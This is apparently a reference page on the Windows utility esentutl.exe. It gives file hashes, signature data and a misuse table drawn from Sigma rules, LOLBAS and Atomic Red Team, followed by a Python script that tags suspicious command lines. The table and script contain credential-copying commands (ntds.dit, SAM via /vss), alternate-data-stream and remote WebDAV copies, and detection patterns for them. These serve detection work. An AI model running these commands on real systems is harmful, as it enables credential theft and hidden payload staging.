esentutl.exe

  • File Path: C:\WINDOWS\system32\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type     Hash
MD5      A9DF466F89B546452C955C6DFC91BF0F
SHA1     84D6F989C265677627306E01E5A2525E39B176B1
SHA256   8A0BF768502C8006CEAC62E3F1564E6893595170A4601E89B0F67C574EC98C41
SHA384   684C7717C1F1FF5989624EA6484B186504EDA516C4DF5858BD90BEDB2683544D592B1DDE402642B1A11F7ABAE670FB87
SHA512   D06F51729AD8C6D00026D27B097F47E1A4A1217CD791819D6AC5F53CDCD6F4EFD260E4F08376E160F5801A0951E23C6BF75798344101B58310D273396F6D9A64
SSDEEP   6144:URFVN/CkAAS4KaXa1CBY6Vet2DtIiuAq5M9V9uoLDG0BSGJMXjAd:URFe7mjNBSLSluoG0AjA

Runtime Data

Child Processes:

conhost.exe

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. esentutl.exe is not inherently malicious: it is the maintenance utility for ESE (Extensible Storage Engine) databases, and its copy mode (/y, optionally with /vss to read through a Volume Shadow Copy) can copy files that are locked open by another process. That is the capability the entries below abuse: copying credential stores such as ntds.dit, SAM and SYSTEM, reading the Internet Explorer/Edge web cache, and reading from or writing to NTFS alternate data streams, including from or to a remote WebDAV path.

Source  Source File  Example  License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utility to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}" MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary
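The Sigma, LOLBAS and Atomic Red Team entries above all key on the same handful of command-line features: copy mode (/y), the /vss switch, a credential store or browser cache as the source, an alternate data stream (a second colon in a drive path) as source or destination, and a UNC path as source or destination. The script below is an added example, not code from Strontic, Sigma, LOLBAS or Red Canary. It parses esentutl command lines from constructed process-creation events (the kind Sysmon Event ID 1 or Security 4688 would supply) and tags each with the patterns it matches, so the detection logic can be unit-tested offline. The severity tiers, the tag names and the treatment of WebCacheV01.dat as the Internet Explorer/Edge cache file targeted by the Qbot rule are this example's own assumptions; the page only names the rules and the commands.

```python
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample events (Image, CommandLine); not taken from the page.
# The first five mirror the LOLBAS / Atomic Red Team commands, the sixth is a
# benign integrity check an admin might run, the seventh is not esentutl itself
# (its esentutl.exe child would arrive as a separate event).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit"),
    (r"C:\Windows\System32\esentutl.exe",
     r'esentutl.exe /y /vss "C:\Windows\System32\config\SAM" /d C:\Temp\sam'),
    (r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /y C:\ADS\file.exe /d C:\ADS\file.txt:file.exe /o"),
    (r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /y \\192.168.100.100\webdav\file.exe /d C:\ADS\file.txt:file.exe /o"),
    (r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o"),
    (r"C:\Windows\System32\esentutl.exe",
     r"esentutl.exe /g C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"),
    (r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\n.dit"),
]

ADS_PATH = re.compile(r"^[A-Za-z]:\\[^:]*:[^\\:]+$")  # C:\dir\file.txt:stream
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")               # \\host\share\...
NTDS = {"ntds.dit"}
HIVES = {"sam", "system", "security"}
WEBCACHE = {"webcachev01.dat"}  # assumption: IE/Edge WebCache ESE database


def parse_esentutl(cmdline: str) -> Dict[str, object]:
    """Extract esentutl's mode, /vss, /o, the source path and the /d destination."""
    # Non-POSIX mode keeps backslashes literal and honours "quoted paths".
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    info: Dict[str, object] = {"mode": None, "vss": False, "overwrite": False,
                               "src": None, "dst": None}
    i = 1
    while i < len(toks):
        low = toks[i].lower()
        if low in ("/y", "-y"):
            info["mode"] = "copy"
        elif low in ("/d", "-d") and i + 1 < len(toks):
            i += 1
            info["dst"] = toks[i]
        elif low.startswith(("/vss", "-vss")):
            info["vss"] = True
        elif low in ("/o", "-o"):
            info["overwrite"] = True
        elif low[:1] in "/-" and info["mode"] is None:
            info["mode"] = low[1:]          # /g integrity, /p repair, /r recovery, ...
        elif low[:1] not in "/-" and info["src"] is None:
            info["src"] = toks[i]           # first positional argument: source/database
        i += 1
    return info


def classify(image: str, cmdline: str) -> Dict[str, object]:
    """Tag one process-creation event with the misuse patterns from the table."""
    if not image.lower().endswith("\\esentutl.exe"):
        return {"severity": "none", "tags": []}
    info = parse_esentutl(cmdline)
    src, dst = str(info["src"] or ""), str(info["dst"] or "")
    tags: List[str] = []
    if info["mode"] == "copy":
        tags.append("copy_mode")
    if info["vss"]:
        tags.append("vss_snapshot")
    base = re.split(r"[\\/]", src)[-1].lower()  # file name part of the source
    if base in NTDS:
        tags.append("ntds_copy")
    if base in HIVES:
        tags.append("credential_hive")
    if base in WEBCACHE:
        tags.append("browser_webcache")
    if ADS_PATH.match(src):
        tags.append("ads_read")
    if ADS_PATH.match(dst):
        tags.append("ads_write")
    if UNC_PATH.match(src):
        tags.append("remote_source")
    if UNC_PATH.match(dst):
        tags.append("remote_dest")
    if {"ntds_copy", "credential_hive", "browser_webcache"} & set(tags):
        sev = "high"
    elif {"ads_read", "ads_write", "remote_source", "remote_dest"} & set(tags):
        sev = "medium"
    elif "copy_mode" in tags:
        sev = "low"   # bare file copy via esentutl: rare for admins, not proof of abuse
    else:
        sev = "none"  # database maintenance modes are left alone
    return {"severity": sev, "tags": tags}


def scan(events: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event that matched at least one pattern."""
    findings = []
    for idx, (image, cmdline) in enumerate(events):
        result = classify(image, cmdline)
        if result["severity"] != "none":
            findings.append({"index": idx, "cmdline": cmdline, **result})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {', '.join(f['tags'])}: {f['cmdline']}")
```

Run against the constructed events, the two /vss copies of ntds.dit and SAM come out high, the two alternate-data-stream writes (one from a remote WebDAV source) medium, the plain .vbs copy low, and the /g integrity check and the cmd.exe wrapper produce nothing. The wrapper case is deliberate: matching on the esentutl image rather than on any command line containing the string, as the Sigma rules do with Image|endswith, avoids double-counting the parent shell while still catching the child.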

MIT License. Copyright (c) 2020-2021 Strontic.